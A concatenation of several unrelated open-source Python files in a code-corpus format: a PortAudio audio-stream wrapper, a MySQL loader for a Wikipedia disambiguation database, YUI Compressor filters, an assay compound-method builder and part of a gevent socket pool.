const PaHostApiInfo *Pa_GetHostApiInfo(PaHostApiIndex);
typedef double PaTime;
typedef struct PaDeviceInfo {
int structVersion;
const char *name;
PaHostApiIndex hostApi;
int maxInputChannels;
int maxOutputChannels;
PaTime defaultLowInputLatency;
PaTime defaultLowOutputLatency;
PaTime defaultHighInputLatency;
PaTime defaultHighOutputLatency;
double defaultSampleRate;
} PaDeviceInfo;
PaDeviceIndex Pa_GetDeviceCount(void);
const PaDeviceInfo *Pa_GetDeviceInfo(PaDeviceIndex);
PaHostApiIndex Pa_GetDefaultHostApi(void);
PaDeviceIndex Pa_GetDefaultInputDevice(void);
PaDeviceIndex Pa_GetDefaultOutputDevice(void);
const char *Pa_GetErrorText(PaError);
typedef void PaStream;
typedef unsigned long PaSampleFormat;
typedef struct PaStreamParameters {
PaDeviceIndex device;
int channelCount;
PaSampleFormat sampleFormat;
PaTime suggestedLatency;
void *hostApiSpecificStreamInfo;
} PaStreamParameters;
typedef unsigned long PaStreamFlags;
typedef struct PaStreamCallbackTimeInfo{
PaTime inputBufferAdcTime;
PaTime currentTime;
PaTime outputBufferDacTime;
} PaStreamCallbackTimeInfo;
typedef unsigned long PaStreamCallbackFlags;
typedef int PaStreamCallback(const void*, void*, unsigned long,
const PaStreamCallbackTimeInfo*,
PaStreamCallbackFlags, void*);
typedef void PaStreamFinishedCallback(void*);
typedef struct PaStreamInfo {
int structVersion;
PaTime inputLatency;
PaTime outputLatency;
double sampleRate;
} PaStreamInfo;
PaError Pa_OpenStream(PaStream**, const PaStreamParameters*,
const PaStreamParameters*, double,
unsigned long, PaStreamFlags,
PaStreamCallback*, void*);
PaError Pa_CloseStream (PaStream*);
PaError Pa_SetStreamFinishedCallback(PaStream*, PaStreamFinishedCallback*);
PaError Pa_StartStream (PaStream*);
PaError Pa_StopStream (PaStream*);
PaError Pa_AbortStream (PaStream*);
PaError Pa_IsStreamStopped (PaStream*);
PaError Pa_IsStreamActive (PaStream*);
const PaStreamInfo *Pa_GetStreamInfo (PaStream*);
PaTime Pa_GetStreamTime (PaStream*);
double Pa_GetStreamCpuLoad (PaStream*);
PaError Pa_ReadStream (PaStream*, void*, unsigned long);
PaError Pa_WriteStream (PaStream*, const void*, unsigned long);
signed long Pa_GetStreamReadAvailable (PaStream*);
signed long Pa_GetStreamWriteAvailable (PaStream*);
PaError Pa_GetSampleSize (PaSampleFormat);
void Pa_Sleep (long);
""")
continue_flag = 0
complete_flag = 1
abort_flag = 2
_np2pa = {
np.dtype('float32'): 0x01,
np.dtype('int32'): 0x02,
np.dtype('int16'): 0x08,
np.dtype('int8'): 0x10,
np.dtype('uint8'): 0x20
}
try:
_pa = ffi.dlopen('portaudio')
except OSError as err:
if sys.platform == 'darwin':
libname = 'portaudio.dylib'
elif sys.platform == 'win32':
from platform import architecture as _architecture
libname = 'portaudio' + _architecture()[0] + '.dll'
else:
raise
_pa = ffi.dlopen(os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'_soundcard_data', libname))
_pa.Pa_Initialize()
atexit.register(_pa.Pa_Terminate)
def hostapi_info(index=None):
"""Return a generator with information about each host API.
If index is given, only one dictionary for the given host API is
returned.
"""
if index is None:
return (hostapi_info(i) for i in range(_pa.Pa_GetHostApiCount()))
else:
info = _pa.Pa_GetHostApiInfo(index)
if not info:
raise RuntimeError("Invalid host API")
assert info.structVersion == 1
return {'name': ffi.string(info.name).decode(errors='ignore'),
'default_input_device': info.defaultInputDevice,
'default_output_device': info.defaultOutputDevice}
def device_info(index=None):
"""Return a generator with information about each device.
If index is given, only one dictionary for the given device is
returned.
"""
if index is None:
return (device_info(i) for i in range(_pa.Pa_GetDeviceCount()))
else:
info = _pa.Pa_GetDeviceInfo(index)
if not info:
raise RuntimeError("Invalid device")
assert info.structVersion == 2
if 'DirectSound' in hostapi_info(info.hostApi)['name']:
enc = 'mbcs'
else:
enc = 'utf-8'
return {'name': ffi.string(info.name).decode(encoding=enc,
errors='ignore'),
'hostapi': info.hostApi,
'max_input_channels': info.maxInputChannels,
'max_output_channels': info.maxOutputChannels,
'default_low_input_latency': info.defaultLowInputLatency,
'default_low_output_latency': info.defaultLowOutputLatency,
'default_high_input_latency': info.defaultHighInputLatency,
'default_high_output_latency': info.defaultHighOutputLatency,
'default_samplerate': info.defaultSampleRate}
def default_hostapi():
"""Return default host API index."""
return _pa.Pa_GetDefaultHostApi()
def default_input_device():
"""Return default input device index."""
idx = _pa.Pa_GetDefaultInputDevice()
if idx < 0:
raise RuntimeError("No default input device available")
return idx
def default_output_device():
"""Return default output device index."""
idx = _pa.Pa_GetDefaultOutputDevice()
if idx < 0:
raise RuntimeError("No default output device available")
return idx
def pa_version():
"""Returns the version information about the portaudio library."""
return (_pa.Pa_GetVersion(), ffi.string(_pa.Pa_GetVersionText()).decode())
class _StreamBase(object):
"""Base class for Stream, InputStream and OutputStream."""
def __init__(self, iparameters, oparameters, samplerate, blocksize,
callback_wrapper, finished_callback,
clip_off=False, dither_off=False, never_drop_input=False,
prime_output_buffers_using_stream_callback=False):
stream_flags = 0x0
if clip_off:
stream_flags |= 0x00000001
if dither_off:
stream_flags |= 0x00000002
if never_drop_input:
stream_flags |= 0x00000004
if prime_output_buffers_using_stream_callback:
stream_flags |= 0x00000008
if callback_wrapper:
self._callback = ffi.callback(
"PaStreamCallback", callback_wrapper, error=abort_flag)
else:
self._callback = ffi.NULL
self._stream = ffi.new("PaStream**")
err = _pa.Pa_OpenStream(self._stream, iparameters, oparameters,
samplerate, blocksize, stream_flags,
self._callback, ffi.NULL)
self._handle_error(err)
# dereference PaStream** --> PaStream*
self._stream = self._stream[0]
# set some stream information
self.blocksize = blocksize
info = _pa.Pa_GetStreamInfo(self._stream)
if not info:
raise RuntimeError("Could not obtain stream info!")
self.samplerate = info.sampleRate
if not oparameters:
self.latency = info.inputLatency
elif not iparameters:
self.latency = info.outputLatency
else:
self.latency = info.inputLatency, info.outputLatency
if finished_callback:
def finished_callback_wrapper(_):
return finished_callback()
self._finished_callback = ffi.callback(
"PaStreamFinishedCallback", finished_callback_wrapper)
err = _pa.Pa_SetStreamFinishedCallback(self._stream,
self._finished_callback)
self._handle_error(err)
# Avoid confusion if something goes wrong before assigning self._stream:
_stream = ffi.NULL
def _handle_error(self, err):
# all error codes are negative:
if err >= 0:
return err
errstr = ffi.string(_pa.Pa_GetErrorText(err)).decode()
if err == -9981 or err == -9980:
# InputOverflowed and OuputUnderflowed are non-fatal:
warnings.warn("%.4f: %s" % (self.time(), errstr),
RuntimeWarning, stacklevel=2)
return err
else:
raise RuntimeError("%.4f: %s" % (self.time(), errstr))
def __del__(self):
# Close stream at garbage collection
self.close()
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, tb):
self.stop()
self.close()
def start(self):
"""Commence audio processing.
If successful, the stream is considered active.
"""
err = _pa.Pa_StartStream(self._stream)
if err == _pa.paStreamIsNotStopped:
return
self._handle_error(err)
def stop(self):
"""Terminate audio processing.
This waits until all pending audio buffers have been played
before it returns. If successful, the stream is considered
inactive.
"""
err = _pa.Pa_StopStream(self._stream)
if err == _pa.paStreamIsStopped:
return
self._handle_error(err)
def abort(self):
"""Terminate audio processing immediately.
This does not wait for pending audio buffers. If successful,
the stream is considered inactive.
"""
err = _pa.Pa_AbortStream(self._stream)
if err == _pa.paStreamIsStopped:
return
self._handle_error(err)
def close(self):
"""Close the stream.
Can be called multiple times.
If the audio stream is active any pending buffers are discarded
as if abort() had been called.
"""
_pa.Pa_CloseStream(self._stream)
# There might be errors if _pa.Pa_Terminate() has been called
# already or if the stream has been closed before.
# Those errors are ignored here, it's too late anyway ...
def is_active(self):
"""Determine whether the stream is active.
A stream is active after a successful call to start(). It
becomes inactive as a result to stop() or abort() or a return
value other than continue from the stream callback.
"""
return self._handle_error(_pa.Pa_IsStreamActive(self._stream)) == 1
def is_stopped(self):
"""Determine whether a stream is stopped.
A stream is stopped before the first call to start() and after
a successful call to stop() or abort(). If the stream callback
returns a value other than continue, the stream is NOT
considered stopped.
"""
return self._handle_error(_pa.Pa_IsStreamStopped(self._stream)) == 1
def time(self):
"""Returns the current stream time in seconds.
This is the same time that is given to the stream callback. It
is monotonically increasing and is not affected by starting or
stopping the stream. This time may be used for synchronizing
other events to the audio stream.
"""
return _pa.Pa_GetStreamTime(self._stream)
def cpu_load(self):
"""Retrieve CPU usage information for the specified stream.
A floating point number between 0.0 and 1.0 that is a fraction
of the total CPU time consumed by the stream callback audio
processing within portaudio. This excludes time spent in the
cffi and Python. This function does not work with blocking
read/write streams.
"""
return _pa.Pa_GetStreamCpuLoad(self._stream)
class InputStream(_StreamBase):
"""Stream for recording only. See :class:`Stream`."""
def __init__(self, samplerate=None, blocksize=0,
device=None, channels=None, dtype='float32', latency=0,
callback=None, finished_callback=None, **flags):
parameters, self.dtype, samplerate = _get_stream_parameters(
'input', device, channels, dtype, latency, samplerate)
self.device = parameters.device
self.channels = parameters.channelCount
def callback_wrapper(iptr, optr, frames, time, status, _):
data = _frombuffer(iptr, frames, self.channels, self.dtype)
return callback(data, _time2dict(time), status)
_StreamBase.__init__(self, parameters, ffi.NULL, samplerate,
blocksize, callback and callback_wrapper,
finished_callback, **flags)
def read_length(self):
"""The number of frames that can be read without waiting."""
return _pa.Pa_GetStreamReadAvailable(self._stream)
def read(self, frames, raw=False):
"""Read samples from an input stream.
The function does not return until the required number of
frames has been read. This may involve waiting for the
operating system to supply the data.
If raw data is requested, the raw cffi data buffer is
returned. Otherwise, a numpy array of the appropriate dtype
with one column per channel is returned.
"""
channels, _ = _split(self.channels)
dtype, _ = _split(self.dtype)
data = ffi.new("signed char[]", channels * dtype.itemsize * frames)
self._handle_error(_pa.Pa_ReadStream(self._stream, data, frames))
if not raw:
data = np.frombuffer(ffi.buffer(data), dtype=dtype)
data.shape = frames, channels
return data
class OutputStream(_StreamBase):
"""Stream for playback only. See :class:`Stream`."""
def __init__(self, samplerate=None, blocksize=0,
device=None, channels=None, dtype='float32', latency=0,
callback=None, finished_callback=None, **flags):
parameters, self.dtype, samplerate = _get_stream_parameters(
'output', device, channels, dtype, latency, samplerate)
self.device = parameters.device
self.channels = parameters.channelCount
def callback_wrapper(iptr, optr, frames, time, status, _):
data = _frombuffer(optr, frames, self.channels, self.dtype)
return callback(data, _time2dict(time), status)
_StreamBase.__init__(self, ffi.NULL, parameters, samplerate,
blocksize, callback and callback_wrapper,
finished_callback, **flags)
def write_length(self):
"""The number of frames that can be written without waiting."""
return _pa.Pa_GetStreamWriteAvailable(self._stream)
def write(self, data):
"""Write samples to an output stream.
As much as one blocksize of audio data will be played
without blocking. If more than one blocksize was provided,
the function will only return when all but one blocksize
has been played.
Data will be converted to a numpy matrix. Multichannel data
should be provided as a (frames, channels) matrix. If the
data is provided as a 1-dim array, it will be treated as mono
data and will be played on all channels simultaneously. If the
data is provided as a 2-dim matrix and fewer tracks are
provided than channels, silence will be played on the missing
channels. Similarly, if more tracks are provided than there
are channels, the extraneous channels will not be played.
"""
frames = len(data)
_, channels = _split(self.channels)
_, dtype = _split(self.dtype)
if (not isinstance(data, np.ndarray) or data.dtype != dtype):
data = np.array(data, dtype=dtype)
if len(data.shape) == 1:
# play mono signals on all channels
data = np.tile(data, (channels, 1)).T
if data.shape[1] > channels:
data = data[:, :channels]
if data.shape < (frames, channels):
# if less data is available than requested, pad with zeros.
tmp = data
data = np.zeros((frames, channels), dtype=dtype)
data[:tmp.shape[0], :tmp.shape[1]] = tmp
data = data.ravel().tostring()
err = _pa.Pa_WriteStream(self._stream, data, frames)
self._handle_error(err)
class Stream(InputStream, OutputStream):
"""Streams handle audio input and output to your application.
Each stream operates at a specific sample rate with specific
sample formats and buffer sizes. Each stream can either be half
duplex (input only or output only) or full duplex (both input and
output). For full duplex operation, the input and output device
must use the same audio api.
Once a stream has been created, audio processing can be started
and stopped multiple times using start(), stop() and abort(). The
functions is_active() and is_stopped() can be used to check this.
The functions info(), time() and cpu_load() can be used to get
additional information about the stream.
Data can be read and written to the stream using read() and
write(). Use read_length() and write_length() to see how many
frames can be read or written at the current time.
Alternatively, a callback can be specified which is called
whenever there is data available to read or write.
"""
def __init__(self, samplerate=None, blocksize=0,
device=None, channels=None, dtype='float32', latency=0,
callback=None, finished_callback=None, **flags):
"""Open a new stream.
If no input or output device is specified, the
default input/output device is taken.
If a callback is given, it will be called whenever the stream
is active and data is available to read or write. If a
finished_callback is given, it will be called whenever the
stream is stopped or aborted. If a callback is given, read()
and write() should not be used.
The callback should have a signature like this:
callback(input, output, time, status) -> flag
where input is the recorded data as a NumPy array, output is
another NumPy array (with uninitialized content), where the data
for playback has to be written to (using indexing).
time is a dictionary with some timing information, and
status indicates whether input or output buffers have
been inserted or dropped to overcome underflow or overflow
conditions.
The function must return one of continue_flag, complete_flag or
abort_flag. complete_flag and abort_flag act as if stop() or
abort() had been called, respectively. continue_flag resumes
normal audio processing.
The finished_callback should be a function with no arguments
and no return values.
"""
idevice, odevice = _split(device)
ichannels, ochannels = _split(channels)
idtype, odtype = _split(dtype)
ilatency, olatency = _split(latency)
iparameters, idtype, isamplerate = _get_stream_parameters(
'input', idevice, ichannels, idtype, ilatency, samplerate)
oparameters, odtype, osamplerate = _get_stream_parameters(
'output', odevice, ochannels, odtype, olatency, samplerate)
self.dtype = idtype, odtype
self.device = iparameters.device, oparameters.device
ichannels = iparameters.channelCount
ochannels = oparameters.channelCount
self.channels = ichannels, ochannels
if isamplerate != osamplerate:
raise RuntimeError(
"Input and output device must have the same samplerate")
else:
samplerate = isamplerate
def callback_wrapper(iptr, optr, frames, time, status, _):
idata = _frombuffer(iptr, frames, ichannels, idtype)
odata = _frombuffer(optr, frames, ochannels, odtype)
return callback(idata, odata, _time2dict(time), status)
_StreamBase.__init__(self, iparameters, oparameters, samplerate,
blocksize, callback and callback_wrapper,
finished_callback, **flags)
def _get_stream_parameters(kind, device, channels, dtype, latency, samplerate):
"""Generate PaStreamParameters struct."""
if device is None:
if kind == 'input':
device = _pa.Pa_GetDefaultInputDevice()
elif kind == 'output':
device = _pa.Pa_GetDefaultOutputDevice()
info = device_info(device)
if channels is None:
channels = info['max_' + kind + '_channels']
dtype = np.dtype(dtype)
try:
sample_format = _np2pa[dtype]
except KeyError:
raise ValueError("Invalid " + kind + " sample format")
if samplerate is None:
samplerate = info['default_samplerate']
parameters = ffi.new(
"PaStreamParameters*",
(device, channels, sample_format, latency, ffi.NULL))
return parameters, dtype, samplerate
def _frombuffer(ptr, frames, channels, dtype):
"""Create NumPy array from a pointer to some memory."""
framesize = channels * dtype.itemsize
data = np.frombuffer(ffi.buffer(ptr, frames * framesize), dtype=dtype)
data.shape = -1, channels
return data
def _time2dict(time):
"""Convert PaStreamCallbackTimeInfo struct to dict."""
return {'input_adc_time': time.inputBufferAdcTime,
'current_time': time.currentTime,
'output_dac_time': time.outputBufferDacTime}
def _split(value):
"""Split input/output value into two values."""
if isinstance(value, str):
# iterable, but not meant for splitting
return value, value
try:
invalue, outvalue = value
except TypeError:
invalue = outvalue = value
except ValueError:
raise ValueError("Only single values and pairs are allowed")
return invalue, outvalue
| bsd-3-clause | -7,574,350,281,367,325,000 | 33.701316 | 79 | 0.657339 | false |
plaufer/wikiwsd | wsd/database/mysqlbuildview.py | 1 | 7099 | import MySQLdb
import logging
import time
MYSQL_DEAD_LOCK_ERROR = 1213
class MySQLBuildView:
"""The MySQLBuildView class allows database access optimized to
build the disambiguation database
"""
def __init__(self, db_connection):
"""constructor
@param db_connector the database connector used to access the database
"""
self._db_connection = db_connection
self._cursor = db_connection.cursor()
self.reset_cache()
def __del__(self):
"""destructor
closes the database connection
"""
self._db_connection.close()
def insert_article(self, id, title):
"""saves an article in the database
@param id the id of the article
@param title the title of the article
"""
try:
self._cursor.execute('INSERT INTO articles(id, title) VALUES(%s, %s);',
(id, title))
except MySQLdb.Error, e:
logging.error('error saving article "%s" to database: %s (%d)'
% (title.encode('ascii', 'ignore'), e.args[1], e.args[0]))
def insert_redirect(self, source_name, target_name):
"""saves a redirect in the database
@param source_name the name of the source article
@param target_name the name of the target article
"""
try:
self._cursor.execute('INSERT INTO redirects(source_article_name, target_article_name) VALUES(%s, %s);',
(source_name, target_name))
except MySQLdb.Error, e:
logging.error('error saving redirect "%s" --> "%s" to database: %s (%d)'
% (source_name.encode('ascii', 'ignore'), target_name.encode('ascii', 'ignore'), e.args[1], e.args[0]))
def insert_link(self, source_article_id, target_article_name):
"""saves a link to the database and updates the article record it points to
@param source_article_id the id of the article which links to the target
@param target_article_name the name of the target article
@return the id of the referenced article or None if not found
"""
target_article_id = self._resolve_title(target_article_name)
if target_article_id == None:
logging.error('Could not resolve target article "%s" for link from source article %d'
% (target_article_name.encode('ascii', 'ignore'), source_article_id))
else:
try:
self._cursor.execute('INSERT INTO links(source_article_id, target_article_id) VALUES(%s, %s);',
(source_article_id, target_article_id))
except MySQLdb.Error, e:
logging.error('error saving link (%d) --> (%d) to database: %s (%d)'
% (source_article_id, target_article_id, e.args[1], e.args[0]))
return target_article_id
def insert_references(self, target_article_ids):
"""inserts references to update the linkincount field of the target article
@param target_article_ids array of the referenced articles
"""
retry = True
retryCount = 0
while retry and retryCount < 10:
try:
retryCount += 1
self._cursor.executemany('UPDATE articles SET articleincount=articleincount+1 WHERE id=%s;', target_article_ids)
retry = False
except MySQLdb.Error, e:
if e.args[0] == MYSQL_DEAD_LOCK_ERROR:
logging.warning('deadlock upading articleincount field. retrying... (%d)' % (retryCount))
time.sleep(0.05)
else:
logging.error('error updating articleincount field for ids: ("%s"): %s (%s)'
% (",".join([str(id) for id in target_article_ids]), str(e.args[1]), str(e.args[0])))
if retry:
logging.error('error updating articleincount field %d retries DEADLOCK when updating ids: ("%s")'
% (retryCount, ",".join([str(id) for id in target_article_ids])))
def insert_disambiguation(self, string, target_article_name):
"""saves a disambiguation to the database
@param string the disambiguation string used for the linked entity
@param target_article_name the name of the article the disambiguation stands for
"""
target_article_id = self._resolve_title(target_article_name)
if target_article_id == None:
logging.error('Could not resolve target article "%s" for link from source article'
% (target_article_name.encode('ascii', 'ignore')))
else:
try:
self._cursor.execute('INSERT INTO disambiguations(string, target_article_id, occurrences) VALUES(%s, %s, 1) ON DUPLICATE KEY UPDATE occurrences=occurrences+1;',
(string, target_article_id))
except MySQLdb.Error, e:
logging.error('error saving disambiguation "%s" --> %s (%d): %s (%d)'
% (string.encode('ascii', 'ignore'), target_article_name.encode('ascii', 'ignore'), target_article_id, e.args[1], e.args[0]))
def insert_ngrams(self, ngrams):
"""inserts ngrams into the database
@param ngrams a list of ngrams where each ngram is a tuple containing the string,
and a zero or one indicating whether it was used as a link
"""
try:
self._cursor.executemany('INSERT INTO ngrams(string, occurrences, as_link) VALUES(LOWER(%s), 1, %s) ON DUPLICATE KEY UPDATE occurrences=occurrences+1, as_link=as_link+VALUES(as_link);',
ngrams)
except MySQLdb.Error, e:
logging.error('error saving ngrams: %s (%d)' % (e.args[1], e.args[0]))
def commit(self):
'''commits the changes
'''
self._db_connection.commit()
def reset_cache(self):
"""resets the internal cache and thus prevents it from growing too big
"""
self._article_id_cache = {}
def _resolve_title(self, title):
"""resolves an article and returns its id
@param title the title of the article
"""
if title in self._article_id_cache:
return self._article_id_cache[title]
try:
self._cursor.execute('SELECT id FROM articles WHERE title=%s;', (title,))
row = self._cursor.fetchone()
if row == None:
self._cursor.execute('SELECT id FROM articles WHERE title=(SELECT target_article_name FROM redirects WHERE source_article_name=%s);',
(title,))
row = self._cursor.fetchone()
if row == None:
self._article_id_cache[title] = None
else:
self._article_id_cache[title] = row[0]
except MySQLdb.Error, e:
logging.error('error resolving article "%s": %s (%d)'
% (title.encode('ascii', 'ignore'), e.args[1], e.args[0]))
return self._article_id_cache[title]
| mit | -3,987,502,628,156,108,000 | 42.286585 | 197 | 0.579377 | false |
bancek/egradebook | src/lib/compressor/filters/yui.py | 1 | 1339 | from subprocess import Popen, PIPE
from compressor.conf import settings
from compressor.filters import FilterBase, FilterError
from compressor.utils import cmd_split
class YUICompressorFilter(FilterBase):
def output(self, **kwargs):
arguments = ''
if self.type == 'js':
arguments = settings.YUI_JS_ARGUMENTS
if self.type == 'css':
arguments = settings.YUI_CSS_ARGUMENTS
command = '%s --type=%s %s' % (settings.YUI_BINARY, self.type, arguments)
if self.verbose:
command += ' --verbose'
try:
p = Popen(cmd_split(command), stdin=PIPE, stdout=PIPE, stderr=PIPE)
filtered, err = p.communicate(self.content)
except IOError, e:
raise FilterError(e)
if p.wait() != 0:
if not err:
err = 'Unable to apply YUI Compressor filter'
raise FilterError(err)
if self.verbose:
print err
return filtered
class YUICSSFilter(YUICompressorFilter):
def __init__(self, *args, **kwargs):
super(YUICSSFilter, self).__init__(*args, **kwargs)
self.type = 'css'
class YUIJSFilter(YUICompressorFilter):
def __init__(self, *args, **kwargs):
super(YUIJSFilter, self).__init__(*args, **kwargs)
self.type = 'js'
| gpl-3.0 | 2,404,042,129,496,164,400 | 26.895833 | 81 | 0.592233 | false |
whereskenneth/Dwarfsquad | dwarfsquad/lib/build/from_export/build_compound_methods.py | 1 | 6738 | from dwarfsquad.lib.build.from_export.helpers import build_reference_map
from dwarfsquad.lib.utils import to_stderr
from dwarfsquad.model.Calibration import Calibration
from dwarfsquad.model.ChromatogramMethod import ChromatogramMethod
from dwarfsquad.model.CompoundMethod import CompoundMethod
from dwarfsquad.model.PeakIntegration import PeakIntegration
from dwarfsquad.model.ReductionMethod import ReductionMethod
from dwarfsquad.model.RetentionTime import RetentionTime
from dwarfsquad.model.Smoothing import Smoothing
from dwarfsquad.model.Threshold import Threshold
def build_compound_methods(compounds_csv):
compound_methods = []
unique_compound_choromatograms = set()
for row in compounds_csv:
try:
compound_method = get_compound_method(compound_methods, row)
chromatogram_method = get_chromatogram_method(row)
compound_method.chromatogram_methods.append(chromatogram_method)
compound_methods.insert(compound_method.view_order, compound_method)
unique_compound_chromatogram_name = compound_method.name + " - " + chromatogram_method.name
if unique_compound_chromatogram_name in unique_compound_choromatograms:
raise Exception("Assay already contains a compound/chromatogram combo of: " +
unique_compound_chromatogram_name)
else:
unique_compound_choromatograms.add(unique_compound_chromatogram_name)
except Exception as e:
for k, v in row.items():
to_stderr(k + ": " + v)
raise e
reference_map = build_reference_map(compound_methods)
return resolve_references(compound_methods, reference_map)
def resolve_references(compound_methods, reference_map):
resolved_cms = []
for cm in compound_methods:
cm.calibration.normalizers = [reference_map[n] for n in cm.calibration.normalizers if n]
cm.calibration.responses = [reference_map[r] for r in cm.calibration.responses if r]
resolved_ch_ms = []
for ch_m in cm.chromatogram_methods:
try:
reference = ch_m.peak_integration.retention_time.reference
ch_m.peak_integration.retention_time.reference = reference_map[reference]
except KeyError:
pass
resolved_ch_ms.append(ch_m)
cm.chromatogram_methods = resolved_ch_ms
resolved_cms.append(cm)
return resolved_cms
def get_chromatogram_method(row):
chromatogram_method = ChromatogramMethod({})
chromatogram_method.set_peak_integration(get_peak_integration(row))
chromatogram_method.set_reduction_method(get_reduction_method(row))
chromatogram_method.set_name(row.get('chromatogram_name'))
return chromatogram_method
def get_reduction_method(row):
reduction_method = ReductionMethod({})
reduction_method.set_activation_energy(row.get('activation_energy'))
reduction_method.set_combine_ions(row.get('combine_ions'))
reduction_method.set_lower_precursor_mass(row.get('lower_precursor_mass'))
reduction_method.set_upper_precursor_mass(row.get('upper_precursor_mass'))
reduction_method.set_lower_product_mass(row.get('lower_product_mass'))
reduction_method.set_upper_product_mass(row.get('upper_product_mass'))
reduction_method.set_polarity(row.get('polarity'))
return reduction_method
def get_peak_integration(row):
peak_integration = PeakIntegration({})
peak_integration.set_retention_time(get_retention_time(row))
peak_integration.set_threshold(get_threshold(row))
peak_integration.set_smoothing(get_smoothing(row))
peak_integration.set_prioritized_peak_models(get_prioritized_peak_models(row))
return peak_integration
def get_prioritized_peak_models(row):
return str(row.get('prioritized_peak_models')).split(';')
def get_smoothing(row):
smoothing = Smoothing({})
smoothing.set_fixed(row.get('fixed'))
smoothing.set_max(row.get('max'))
smoothing.set_min(row.get('min'))
smoothing.set_optimal_enabled(row.get('optimal_enabled'))
smoothing.set_start(row.get('start'))
return smoothing
def get_threshold(row):
threshold = Threshold({})
threshold.set_peak_probability(row.get('peak_probability'))
threshold.set_absolute_area(row.get('absolute_area'))
threshold.set_absolute_height(row.get('absolute_height'))
threshold.set_first_derivative(row.get('first_derivative'))
threshold.set_second_derivative(row.get('second_derivative'))
threshold.set_min_merge_difference(row.get('min_merge_difference'))
threshold.set_relative_area(row.get('relative_area'))
threshold.set_relative_height(row.get('relative_height'))
threshold.set_saturation(row.get('saturation'))
threshold.set_signal_to_noise(row.get('signal_to_noise'))
threshold.set_relative_low_std_area(row.get('relative_low_std_area'))
threshold.set_relative_low_std_height(row.get('relative_low_std_height'))
return threshold
def get_retention_time(row):
retention_time = RetentionTime({})
retention_time.set_bias(row.get('bias'))
retention_time.set_expected(row.get('expected'))
retention_time.set_lower_tolerance(row.get('lower_tolerance'))
retention_time.set_upper_tolerance(row.get('upper_tolerance'))
retention_time.set_reference(row.get('reference'))
retention_time.set_reference_type_source(row.get('reference_type_source'))
retention_time.set_upper_trace_width(row.get('upper_trace_width'))
retention_time.set_lower_trace_width(row.get('lower_trace_width'))
retention_time.set_window_width(row.get('window_width'))
retention_time.set_estimation_width(row.get('estimation_width'))
retention_time.set_window_multiplier(row.get('window_multiplier'))
return retention_time
def get_calibration(row):
calibration = Calibration({})
calibration.set_degree(row.get('degree'))
calibration.set_enabled(row.get('enabled'))
calibration.set_origin(row.get('origin'))
calibration.set_weighting(row.get('weighting'))
try:
calibration.set_normalizers(str(row.get('normalizers')).split(';'))
except ValueError:
calibration.set_normalizers([])
try:
calibration.set_responses(str(row.get('responses')).split(';'))
except ValueError:
calibration.set_responses([])
return calibration
def get_compound_method(cms, row):
for index, cm in enumerate(cms):
if row.get('compound_name') == cm.name:
return cms.pop(index)
cm = CompoundMethod({})
cm.set_name(row.get('compound_name'))
cm.set_view_order(row.get('view_order'))
cm.set_calibration(get_calibration(row))
return cm
| mit | -6,402,530,371,406,678,000 | 37.502857 | 103 | 0.706886 | false |
paypal/support | support/socket_pool.py | 1 | 6787 | '''
Protocol-agnostic socket pooler.
This code is both extremely tested and hard to test.
Modify with caution :-)
"There are two ways of constructing a software design:
One way is to make it so simple that there are obviously no deficiencies,
and the other way is to make it so complicated that there are no obvious deficiencies."
-CAR Hoare, 1980 Turing Award lecture
In particular: it is tempting to attempt to auto-reconnect and re-try at this layer.
This is not possible to do correctly however, since only the protocol aware clients
know what a retry entails. (e.g. SSL handshake, reset protocol state)
'''
import time
import select
import socket
import gevent
import ll
ml = ll.LLogger()
# TODO: free_socks_by_addr using sets instead of lists could probably improve
# performance of cull
class SocketPool(object):
def __init__(self, timeout=0.25, max_sockets=800):
import async # breaks circular dependency
self.timeout = timeout
self.free_socks_by_addr = {}
self.sock_idle_times = {}
self.killsock = async.killsock
self.total_sockets = 0
self.max_socks_by_addr = {} # maximum sockets on an address-by-address basis
self.default_max_socks_per_addr = 50
self.max_sockets = 800
def acquire(self, addr):
#return a free socket, if one is availble; else None
try:
self.cull()
except Exception as e: # never bother caller with cull problems
ml.ld("Exception from cull: {0!r}", e)
socks = self.free_socks_by_addr.get(addr)
if socks:
sock = socks.pop()
del self.sock_idle_times[sock]
try: # sock.fileno() will throw if EBADF
ml.ld("Acquiring sock {0}/FD {1}", str(id(sock)), str(sock.fileno()))
except:
pass
return sock
return None
def release(self, sock):
#this is also a way of "registering" a socket with the pool
#basically, this says "I'm done with this socket, make it available for anyone else"
try: # sock.fileno() will throw if EBADF
ml.ld("Releasing sock {0} /FD {1}", str(id(sock)), str(sock.fileno()))
except:
pass
try:
if select.select([sock], [], [], 0)[0]:
self.killsock(sock)
return #TODO: raise exception when handed messed up socket?
#socket is readable means one of two things:
#1- left in a bad state (e.g. more data waiting -- protocol state is messed up)
#2- socket closed by remote (in which case read will return empty string)
except:
return #if socket was closed, select will raise socket.error('Bad file descriptor')
addr = sock.getpeername()
addr_socks = self.free_socks_by_addr.setdefault(addr, [])
self.total_sockets += 1
self.sock_idle_times[sock] = time.time()
addr_socks.append(sock)
self.reduce_addr_size(addr, self.max_socks_by_addr.get(addr, self.default_max_socks_per_addr))
self.reduce_size(self.max_sockets)
def reduce_size(self, size):
'''
reduce to the specified size by killing the oldest sockets
returns a greenlet that can be joined on to wait for all sockets to close
'''
if self.total_sockets <= size:
return
num_culling = self.total_sockets - size
culled = sorted([(v, k) for k,v in self.sock_idle_times.iteritems()])[-num_culling:]
self.total_sockets -= num_culling
return [self._remove_sock(e[1]) for e in culled]
def reduce_addr_size(self, addr, size):
'''
reduce the number of sockets pooled on the specified address to size
returns a greenlet that can be joined on to wait for all sockets to close
'''
addr_socks = self.free_socks_by_addr.get(addr, [])
if len(addr_socks) <= size:
return
num_culling = len(addr_socks) - size
culled = sorted([(self.sock_idle_times[e], e) for e in addr_socks])[-num_culling:]
self.total_sockets -= num_culling
return [self._remove_sock(e[1]) for e in culled]
def _remove_sock(self, sock):
self.free_socks_by_addr[sock.getpeername()].remove(sock)
del self.sock_idle_times[sock]
return gevent.spawn(self.killsock, sock)
def socks_pooled_for_addr(self, addr):
return len(self.free_socks_by_addr.get(addr, ()))
def cull(self):
#cull sockets which are in a bad state
culled = []
self.total_sockets = 0
#sort the living from the soon-to-be-dead
for addr in self.free_socks_by_addr:
live = []
# STEP 1 - CULL IDLE SOCKETS
for sock in self.free_socks_by_addr[addr]:
# in case the socket does not have an entry in sock_idle_times,
# assume the socket is very old and cull
if time.time() - self.sock_idle_times.get(sock, 0) > self.timeout:
try:
ml.ld("Going to Close sock {{{0}}}/FD {1}",
id(sock), sock.fileno())
except:
pass
culled.append(sock)
